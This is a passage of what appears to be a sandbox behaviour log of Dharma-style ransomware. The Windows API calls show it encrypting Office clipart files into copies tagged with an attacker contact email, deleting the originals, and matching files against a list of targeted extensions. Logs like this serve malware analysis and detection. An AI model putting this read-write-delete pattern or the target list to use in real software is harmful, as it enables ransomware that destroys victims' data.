CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.002] GetLastError () returned 0x0 [0271.002] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x2eda, lpOverlapped=0x0) returned 1 [0271.003] WriteFile (in: hFile=0x3a4, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x2ee0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x2ee0, lpOverlapped=0x0) returned 1 [0271.004] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.004] WriteFile (in: hFile=0x3a4, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.004] SetEndOfFile (hFile=0x3a4) returned 1 [0271.004] CloseHandle (hObject=0x3a4) returned 1 [0271.004] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.004] SetEndOfFile (hFile=0x384) returned 1 [0271.006] CloseHandle (hObject=0x384) returned 1 [0271.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf")) returned 1 [0271.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.007] lstrlenW (lpString=".doc") returned 4 [0271.007] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.007] lstrlenW (lpString=".docx") returned 5 [0271.007] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.007] lstrlenW (lpString=".pdf") returned 4 [0271.007] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.007] lstrlenW (lpString=".xls") returned 4 [0271.007] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.007] lstrlenW (lpString=".xlsx") returned 5 [0271.007] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.007] lstrlenW (lpString=".ppt") returned 4 [0271.007] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.007] lstrlenW (lpString=".zip") returned 4 [0271.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.007] lstrlenW (lpString=".rar") returned 4 [0271.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.007] lstrlenW (lpString=".bz2") returned 4 [0271.007] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.007] lstrlenW (lpString=".7z") returned 3 [0271.007] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.007] lstrlenW (lpString=".dbf") returned 4 [0271.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.008] lstrlenW (lpString=".1cd") returned 4 [0271.008] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.008] lstrlenW (lpString=".jpg") returned 4 [0271.008] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.008] lstrlenW (lpString=".doc") returned 4 [0271.008] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString=".docx") returned 5 [0271.008] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.008] lstrlenW (lpString=".pdf") returned 4 [0271.008] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString=".xls") returned 4 [0271.008] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.008] lstrlenW (lpString=".xlsx") returned 5 [0271.008] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.008] lstrlenW (lpString=".ppt") returned 4 [0271.008] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.008] lstrlenW (lpString=".zip") returned 4 [0271.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.008] lstrlenW (lpString=".rar") returned 4 [0271.008] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString=".bz2") returned 4 [0271.008] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.008] lstrlenW (lpString=".7z") returned 3 [0271.008] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.009] lstrlenW (lpString=".dbf") returned 4 [0271.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.009] lstrlenW (lpString=".1cd") returned 4 [0271.009] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63 [0271.009] lstrlenW (lpString=".jpg") returned 4 [0271.009] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.009] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.009] lstrlenW (lpString="FD00077_.WMF") returned 12 [0271.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.010] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=30240) returned 1 [0271.010] CloseHandle (hObject=0x384) returned 1 [0271.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf")) returned 0x20 [0271.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.010] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.010] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.011] GetLastError () returned 0x0 [0271.011] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x7620, lpOverlapped=0x0) returned 1 [0271.013] WriteFile (in: hFile=0x3a4, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x7630, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x7630, lpOverlapped=0x0) returned 1 [0271.076] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.076] WriteFile (in: hFile=0x3a4, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.076] SetEndOfFile (hFile=0x3a4) returned 1 [0271.076] CloseHandle (hObject=0x3a4) returned 1 [0271.076] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.076] SetEndOfFile (hFile=0x384) returned 1 [0271.079] CloseHandle (hObject=0x384) returned 1 [0271.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.125] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf")) returned 1 [0271.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.126] lstrlenW (lpString=".doc") returned 4 [0271.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.126] lstrlenW (lpString=".docx") returned 5 [0271.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.126] lstrlenW (lpString=".pdf") returned 4 [0271.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.126] lstrlenW (lpString=".xls") returned 4 [0271.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.126] lstrlenW (lpString=".xlsx") returned 5 [0271.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.126] lstrlenW (lpString=".ppt") returned 4 [0271.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.126] lstrlenW (lpString=".zip") returned 4 [0271.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.126] lstrlenW (lpString=".rar") returned 4 [0271.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.126] lstrlenW (lpString=".bz2") returned 4 [0271.126] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.126] lstrlenW (lpString=".7z") returned 3 [0271.126] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.126] lstrlenW (lpString=".dbf") returned 4 [0271.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.126] lstrlenW (lpString=".1cd") returned 4 [0271.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.127] lstrlenW (lpString=".jpg") returned 4 [0271.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.127] lstrlenW (lpString=".doc") returned 4 [0271.127] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString=".docx") returned 5 [0271.127] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.127] lstrlenW (lpString=".pdf") returned 4 [0271.127] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString=".xls") returned 4 [0271.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.127] lstrlenW (lpString=".xlsx") returned 5 [0271.127] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.127] lstrlenW (lpString=".ppt") returned 4 [0271.127] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.127] lstrlenW (lpString=".zip") returned 4 [0271.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.127] lstrlenW (lpString=".rar") returned 4 [0271.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString=".bz2") returned 4 [0271.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.127] lstrlenW (lpString=".7z") returned 3 [0271.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.127] lstrlenW (lpString=".dbf") returned 4 [0271.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.128] lstrlenW (lpString=".1cd") returned 4 [0271.128] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 63 [0271.128] lstrlenW (lpString=".jpg") returned 4 [0271.128] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.128] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.128] lstrlenW (lpString="FD00336_.WMF") returned 12 [0271.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.128] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=6068) returned 1 [0271.128] CloseHandle (hObject=0x394) returned 1 [0271.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf")) returned 0x20 [0271.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.129] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.129] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.129] GetLastError () returned 0x0 [0271.129] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x17b4, lpOverlapped=0x0) returned 1 [0271.172] WriteFile (in: hFile=0x3a8, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x17c0, lpOverlapped=0x0) returned 1 [0271.173] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.173] WriteFile (in: hFile=0x3a8, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.173] SetEndOfFile (hFile=0x3a8) returned 1 [0271.173] CloseHandle (hObject=0x3a8) returned 1 [0271.173] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.173] SetEndOfFile (hFile=0x394) returned 1 [0271.175] CloseHandle (hObject=0x394) returned 1 [0271.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.175] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf")) returned 1 [0271.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.176] lstrlenW (lpString=".doc") returned 4 [0271.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.176] lstrlenW (lpString=".docx") returned 5 [0271.176] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.176] lstrlenW (lpString=".pdf") returned 4 [0271.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.176] lstrlenW (lpString=".xls") returned 4 [0271.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.176] lstrlenW (lpString=".xlsx") returned 5 [0271.176] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.176] lstrlenW (lpString=".ppt") returned 4 [0271.176] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.176] lstrlenW (lpString=".zip") returned 4 [0271.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.176] lstrlenW (lpString=".rar") returned 4 [0271.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.176] lstrlenW (lpString=".bz2") returned 4 [0271.176] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.176] lstrlenW (lpString=".7z") returned 3 [0271.176] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.176] lstrlenW (lpString=".dbf") returned 4 [0271.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.177] lstrlenW (lpString=".1cd") returned 4 [0271.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.177] lstrlenW (lpString=".jpg") returned 4 [0271.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.177] lstrlenW (lpString=".doc") returned 4 [0271.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.177] lstrlenW (lpString=".docx") returned 5 [0271.177] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.177] lstrlenW (lpString=".pdf") returned 4 [0271.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.177] lstrlenW (lpString=".xls") returned 4 [0271.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.177] lstrlenW (lpString=".xlsx") returned 5 [0271.177] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.177] lstrlenW (lpString=".ppt") returned 4 [0271.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.177] lstrlenW (lpString=".zip") returned 4 [0271.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.177] lstrlenW (lpString=".rar") returned 4 [0271.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.178] lstrlenW (lpString=".bz2") returned 4 [0271.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.178] lstrlenW (lpString=".7z") returned 3 [0271.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.178] lstrlenW (lpString=".dbf") returned 4 [0271.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.178] lstrlenW (lpString=".1cd") returned 4 [0271.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63 [0271.178] lstrlenW (lpString=".jpg") returned 4 [0271.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.178] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.178] lstrlenW (lpString="FD00361_.WMF") returned 12 [0271.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.179] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=4074) returned 1 [0271.179] CloseHandle (hObject=0x394) returned 1 [0271.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf")) returned 0x20 [0271.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.179] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.179] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.180] GetLastError () returned 0x0 [0271.180] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xfea, lpOverlapped=0x0) returned 1 [0271.196] WriteFile (in: 